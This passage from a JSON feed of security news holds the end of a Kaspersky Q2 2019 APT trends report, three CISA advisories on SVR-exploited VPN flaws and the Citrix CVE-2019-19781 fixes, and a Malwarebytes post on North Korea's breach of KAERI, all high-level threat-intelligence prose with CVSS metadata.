a registry key, a PowerShell stager and FruityC2 agent script, and an open source framework on GitHub to further enumerate the host machine. This could allow the attackers to monitor web logs and determine whether someone outside the campaign has made a request to their server in an attempt to investigate the activity. Once the enumeration commands run, the agent communicates with a different C2 and sends back data in the URL field. 
Trend Micro also reported MuddyWater's use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3.\n\nWe published a private report about four Android malware families and their use of false flag techniques, among other things. One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government, using compromised legitimate accounts to trick victims into installing malware.\n\nRegarding other groups, we discovered [new activity related to ZooPark](<https://securelist.com/whos-who-in-the-zoo/85394/>), a cyber-espionage threat actor that has focused mainly on stealing data from Android devices. Our new findings include new malicious samples and additional infrastructure that has been deployed since 2016. This also led to us discovering Windows malware implants deployed by the same threat actor. The additional indicators we found shed some light on the targets of past campaigns, including Iranian Kurds \u2013 mainly political dissidents and activists.\n\nRecorded Future [published an analysis](<https://www.recordedfuture.com/iranian-cyber-operations-infrastructure/>) of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations. Following the exposure of a wide range of their infrastructure and operations by Symantec in March, researchers at Recorded Future discovered that APT33, or closely aligned actors, reacted by either parking or reassigning some of their domain infrastructure. The fact that this activity was executed just a day or so after the report went live suggests the Iranian threat actors are acutely aware of the media coverage of their activities and are resourceful enough to be able to react in a quick manner. Since then, the attackers have continued to use a large swath of operational infrastructure, well in excess of 1,200 domains, with many observed communicating with 19 different commodity RAT implants. 
An interesting development appears to be their increased preference for njRAT, with over half of the observed suspected APT33 infrastructure being linked to njRAT deployment.\n\nOn a more political level, there were several news stories covering Iranian activity.\n\nA group connected to the Iranian Revolutionary Guard [has been blamed](<https://news.sky.com/story/iran-conducted-major-cyber-assault-on-key-uk-infrastructure-11676686>) for a wave of cyber-attacks against UK national infrastructure, including the Post Office, local government networks, private companies and banks. Personal data of thousands of employees were stolen. It is believed that the same group was also responsible for the attack on the UK parliamentary network in 2017. The UK NCSC (National Cyber Security Centre) is providing assistance to affected organizations.\n\nMicrosoft [recently obtained a court order](<https://www.cyberscoop.com/microsoft-uses-court-order-shut-apt-linked-websites/>) in the US to seize control of 99 websites used by the Iranian hacking group APT35 (aka Phosphorus and Charming Kitten). The threat actor used spoofed websites, including those of Microsoft and Yahoo, to conduct cyberattacks against businesses, government agencies, journalists and activists who focus on Iran. The sinkholing of these sites will force the group to recreate part of its infrastructure.\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) [has reported](<https://www.bleepingcomputer.com/news/security/us-government-warns-of-data-wipers-used-in-iranian-cyberattacks/>) an increase in cyberattacks by Iranian actors or proxies, targeting US industries and government agencies using destructive wiper tools. The statement was posted on Twitter by CISA director, Chris Krebs.\n\n## Southeast Asia and Korean Peninsula\n\nThis quarter we detected a lot of Korean-related activity. 
However, for the rest of the Southeast Asian region there has not been that much activity, especially when compared to earlier periods.\n\nEarly in Q2, we identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It's clear that Lazarus keeps updating its tools very quickly. Meanwhile, BlueNoroff, the Lazarus sub-group that typically targets financial institutions, targeted a bank in Central Asia and a crypto-currency business in China.\n\nIn a recent campaign, we observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT \u2013 a cloud service-based backdoor. ScarCruft is a highly skilled APT group, historically using geo-political issues to target the Korean Peninsula. We found several victims worldwide identified as companies and individuals with ties to North Korea, as well as a diplomatic agency. Interestingly, we observed that ScarCruft continues to adopt publicly available exploit code in its tools. We also found an interesting overlap in a Russian-based victim targeted both by ScarCruft and DarkHotel \u2013 not the first time that we have seen such an overlap.\n\nESET [recently analyzed](<https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/>) a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal. This backdoor shares its features with a previous Mac OS variant, but the structure has changed and detection is now much harder. Researchers were unable to find the dropper associated with this sample, so they could not identify the initial compromise vector.\n\nThe US Department of Homeland Security (DHS) [has reported](<https://www.us-cert.gov/ncas/analysis-reports/AR19-100A>) Trojan variants, identified as HOPLIGHT, being used by the North Korean government. The report includes an analysis of nine malicious executable files. 
Seven of them are proxy applications that mask traffic between the malware and the remote operators. The proxies have the ability to generate fake TLS handshake sessions using valid public SSL certificates, disguising network connections with remote malicious actors. One file contains a public SSL certificate and the payload of the file appears to be encoded with a password or key. The remaining file does not contain any of the public SSL certificates, but attempts outbound connections and drops four files: the dropped files primarily contain IP addresses and SSL certificates.\n\nIn June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia. The threat actor behind the campaign, which [we believe to be the PLATINUM APT group](<https://securelist.com/platinum-is-back/91135/>), uses an elaborate, previously unseen, steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof: the actors used two interesting steganography techniques in this APT. It's also interesting that the attackers decided to implement the utilities they need as one huge set \u2013 an example of the framework-based architecture that is becoming more and more popular.\n\n## Other interesting discoveries\n\nOn May 14, Microsoft [released fixes](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) for a critical Remote Code Execution vulnerability (CVE-2019-0708) in Remote Desktop Services (formerly known as Terminal Services) that affects some older versions of Windows: Windows 7, Windows Server 2008 R2, Windows Server 2008 and some unsupported versions of Windows \u2013 including Windows 2003 and Windows XP. 
Details on how to mitigate this vulnerability are available in our private report 'Analysis and detection guidance for CVE-2019-0708'. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is 'wormable', meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way that WannaCry spread. Microsoft has not observed exploitation of this vulnerability, but believes it is highly likely that malicious actors will write an exploit for it.\n\nEarly in June, researchers at Malwarebytes Labs [observed](<https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/>) a number of compromises on Amazon CloudFront, a Content Delivery Network (CDN), where hosted JavaScript libraries were tampered with and injected with web skimmers. Although attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn't always the case. Some websites either use Amazon's cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket. Without properly validating externally loaded content, these sites are exposing their users to various threats, including some that pilfer credit card data. After analyzing these breaches, researchers found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs. CDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics. The sites they identified had nothing in common other than the fact they were all using their own custom CDN to load various libraries. 
In effect, the only resulting victims of a compromise on their CDN repository would be themselves.\n\nDragos has reported that XENOTIME, the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017, [has expanded](<https://threatpost.com/trisis-physical-destruction-electric-companies/145712/>) its focus beyond the oil and gas industries. Researchers have recently seen the group probing the networks of electric utility organizations in the US and elsewhere \u2013 perhaps as a precursor to a dangerous attack on critical infrastructure that could potentially cause physical damage or loss of life. Dragos first noticed the shift in targeting in late 2018; and the attacks have continued into 2019.\n\nWe [recently reported](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) on the latest versions of FinSpy for Android and iOS, developed in mid-2018. This surveillance software is sold to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. WikiLeaks first discovered the implants for desktop devices in 2011 and mobile implants were discovered in 2012. Since then Kaspersky has continuously monitored the development of this malware and the emergence of new versions in the wild. Mobile implants for iOS and Android have almost the same functionality. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It would seem that the iOS solution doesn't provide infection exploits for its customers: the product seems to be fine-tuned to clean traces of publicly available jailbreaking tools. 
This might imply that physical access to the victim's device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we haven't observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims may be much higher.\n\n## Final thoughts\n\nAPT activity in the Middle East has been particularly interesting this quarter, not least because of the leaks related to alleged Iranian activity. This is especially interesting because one of those leaks might have been part of a disinformation campaign carried out with the help of the Sofacy/Hades threat actor.\n\nIn contrast to earlier periods, when Southeast Asia was the most active region for APTs, the activities we detected this quarter were mainly Korean-related. For the rest of the region, it was a much quieter quarter.\n\nAcross all regions, geo-politics remains the principal driver of APT activity.\n\nIt is also clear from our FinSpy research that there is a high demand for 'commercial' malware from governments and law enforcement agencies.\n\nOne of the most noteworthy aspects of the APT threat landscape we reported this quarter was our discovery of TajMahal, a previously unknown and technically sophisticated APT framework that has been in development for at least five years. This full-blown spying framework includes up to 80 malicious modules stored in its encrypted Virtual File System \u2013 one of the highest numbers of plugins we've ever seen for an APT toolset.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. 
However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2019-08-01T10:00:05", "type": "securelist", "title": "APT trends report Q2 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-3568"], "modified": "2019-08-01T10:00:05", "id": "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "href": "https://securelist.com/apt-trends-report-q2-2019/91897/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-09-29T18:14:37", "description": "CISA, the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) have released a [Joint Cybersecurity Advisory (CSA)](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>) on Russian Foreign Intelligence Service (SVR) actors scanning for and exploiting vulnerabilities to compromise U.S. 
and allied networks, including national security and government-related systems.\n\nSpecifically, SVR actors are targeting and exploiting the following vulnerabilities:\n\n * [CVE-2018-13379 Fortinet FortiGate VPN](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [CVE-2019-9670 Synacor Zimbra Collaboration Suite](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>)\n * [CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CVE-2019-19781 Citrix Application Delivery Controller and Gateway](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [CVE-2020-4006 VMware Workspace ONE Access](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>)\n\nAdditionally the White House has released a [statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) formally attributing this activity and the SolarWinds supply chain compromise to SVR actors. 
CISA has updated the following products to reflect this attribution:\n\n * [Alert AA20-352A: APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * [Alert AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool](<https://us-cert.cisa.gov/ncas/alerts/aa21-077a>)\n * [Malware Analysis Report AR21-039A: MAR-10318845-1.v1 - SUNBURST](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a>)\n * [Malware Analysis Report AR21-039B: MAR-10320115-1.v1 - TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>)\n * Table: SolarWinds and Active Directory/M365 Compromise - Detecting APT Activity from Known TTPs\n * [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise web page](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * [Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise](<https://cyber.dhs.gov/ed/21-01/>)\n\nCISA strongly encourages users and administrators to review [Joint CSA: Russian SVR Targets U.S. 
and Allied Networks](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) for SVR tactics, techniques, and procedures, as well as mitigation strategies.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-15T00:00:00", "type": "cisa", "title": "NSA-CISA-FBI Joint Advisory on Russian SVR Targeting U.S. 
and Allied Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-09-28T00:00:00", "id": "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:54", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has released a [utility](<https://github.com/cisagov/check-cve-2019-19781>) that enables users and administrators to test whether their Citrix Application Delivery Controller (ADC) and Citrix Gateway software is susceptible to the CVE-2019-19781 vulnerability. 
According to Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>), beginning on January 20, 2020, Citrix will be releasing new versions of Citrix ADC and Citrix Gateway that will patch CVE-2019-19781.\n\nCISA strongly advises affected organizations to review CERT/CC\u2019s Vulnerability Note [VU#619785](<https://www.kb.cert.org/vuls/id/619785/>) and Citrix Security Bulletin [CTX267027 ](<https://support.citrix.com/article/CTX267027>)and apply the mitigations until Citrix releases new versions of the software.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T00:00:00", "type": "cisa", "title": "CISA Releases Test for Citrix ADC and Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": 
false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "CISA:661993843C9F9A838ADA8B8B8B9412D1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:50", "description": "Citrix has released security updates to address the CVE-2019-19781 vulnerability in Citrix SD-WAN WANOP. An attacker could exploit this vulnerability to take control of an affected system. Citrix has also released an Indicators of Compromise Scanner that aims to identify evidence of successful exploitation of CVE-2019-19781.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends users and administrators review the Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>) and apply the necessary updates. CISA also recommends users and administrators:\n\n * Run the [Indicators of Compromise Scanner](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>);\n * Review the Citrix article on [CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>), published January 23, 2020; and\n * Review CISA\u2019s Activity Alert on [Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://www.us-cert.gov/ncas/alerts/aa20-020a>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop>); we'd 
welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T00:00:00", "type": "cisa", "title": "Citrix Releases Security Updates for SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-23T00:00:00", "id": "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:51", "description": "Citrix has released an article with updates on CVE-2019-19781, a vulnerability affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway. This vulnerability also affects Citrix SD-WAN WANOP product versions 10.2.6 and version 11.0.3. The article includes updated mitigations for Citrix ADC and Citrix Gateway Release 12.1 build 50.28. An attacker could exploit CVE-2019-19781 to take control of an affected system. 
Citrix plans to begin releasing security updates for affected software starting January 20, 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) recommends users and administrators:\n\n * Review the Citrix article on [updates on Citrix ADC, Citrix Gateway vulnerability](<https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/>), published January 17, 2020;\n * See Citrix Security Bulletin [CTX267027 \u2013 Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027>);\n * Apply the recommended mitigations in [CTX267679 \u2013 Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>); and\n * Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T00:00:00", "type": "cisa", "title": "Citrix Adds SD-WAN WANOP, Updated Mitigations to CVE-2019-19781 Advisory", "bulletinFamily": "info", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-17T00:00:00", "id": "CISA:134C272F26FB005321448C648224EB02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-06-21T14:31:54", "description": "Remember when we told you to patch your VPNs already? I hate to say "I told you so", but I informed you thusly.\n\nAccording to South Korean officials a North Korean cyber-espionage group managed to infiltrate the network of South Korea's state-run nuclear research institute last month.\n\n### The crime: time and place\n\nCybersecurity news hounds The Record report that a spokesperson for the Korea Atomic Energy Research Institute (KAERI) said [the intrusion took place last month](<https://therecord.media/north-korean-hackers-breach-south-koreas-atomic-research-agency-through-vpn-bug/>), on May 14 to be exact, through a vulnerability in a virtual private network (VPN) server. Since its establishment in 1959, KAERI has been the only research institute in Korea dedicated to nuclear energy. Reportedly, thirteen unauthorized IP addresses accessed KAERI\u2019s internal network.\n\n### The suspect: Kimsuky\n\nSome of the addresses could be traced back to the APT group called Kimsuky. 
One of the IP addresses was used in an attack that targeted COVID-19 vaccine developers in South Korea last year.\n\nNorth Korean cyber-attacks on its southern neighbor are not uncommon. And Kimsuky is the APT that is best known for these attacks. The Kimsuky APT is a North Korean threat actor that has been active since 2012 and targets government entities mainly in South Korea. Recently, we reported about [this group using the AppleSeed backdoor](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) against the Ministry of Foreign Affairs of South Korea.\n\n### The victim: KAERI\n\nKAERI is a national research institute which was instrumental in developing nuclear technology for power generation and industrial applications. And while North Korea is ahead of South Korea in some nuclear fields\u2014notably nuclear weapons\u2014it is thought to be weaker than its neighbor when it comes to energy generation. As we stated in our earlier [report](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>), one of the other targets was the nuclear security officer for the International Atomic Energy Agency (IAEA), a UN organization tasked with nuclear regulations and cooperation.\n\n### The weapon: a VPN vulnerability\n\nIn a [statement](<https://translate.google.com/translate?sl=auto&tl=en&u=https://www.kaeri.re.kr/board/view?menuId%3DMENU00326%26linkId%3D9181>), KAERI says that an unidentified outsider accessed parts of its system using weaknesses in its virtual private network (VPN). It also states that the attackers' IP addresses were blocked, and its system upgraded, when it found out about the attack, on May 31. \n\nThe name of the VPN vendor is being kept secret. Although we can't rule out a zero-day, the fact that this wasn't mentioned, and that the system was updated in response, suggests it wasn't. 
It certainly doesn't need to be, and there are a lot of known vulnerabilities in the running. Many of them are years old, and many are known to be used in the wild. Even though patches are available, the application of these patches has taken some organizations quite some time. \n\nWe also wrote recently about vulnerabilities in the [Pulse Secure VPN](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>). Pulse issued a final patch on May 3 for a set of vulnerabilities that were used in the wild.\n\nThe NSA also issued an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) in April about five publicly known vulnerabilities being exploited by the Russian Foreign Intelligence Service (SVR). The CVE numbers used to identify vulnerabilities start with the year the CVE was issued. What's most striking about the NSA's list is just how old most of the vulnerabilities on it are.\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) Fortinet FortiGate VPN\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) Synacor Zimbra Collaboration Suite\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) Pulse Secure Pulse Connect Secure VPN\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) Citrix Application Delivery Controller and Gateway\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) VMware Workspace ONE Access\n\nAs you can see, most of them are VPNs and other networking-related applications. By design a VPN is remotely accessible, which makes it a target that attackers can reach from anywhere. A VPN or gateway is always a likely target, especially if it has a known vulnerability. 
And a seasoned APT group, like Kimsuky, will have fewer problems reverse-engineering patches than your everyday cybercriminal.\n\n### Patching or lack thereof\n\nThe risky strategy of little-to-no-patching stands a good chance of going horribly wrong. A [Forbes study](<https://www.forbes.com/sites/taylorarmerding/2019/06/06/report-if-you-dont-patch-you-will-pay>) of 340 security professionals in 2019 found 27% of organizations worldwide, and 34% in Europe, said they\u2019d experienced breaches due to unpatched vulnerabilities. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nStay safe, everyone!\n\nThe post [Atomic research institute breached via VPN vulnerability](<https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-21T13:53:03", "type": "malwarebytes", "title": "Atomic research institute breached via VPN vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
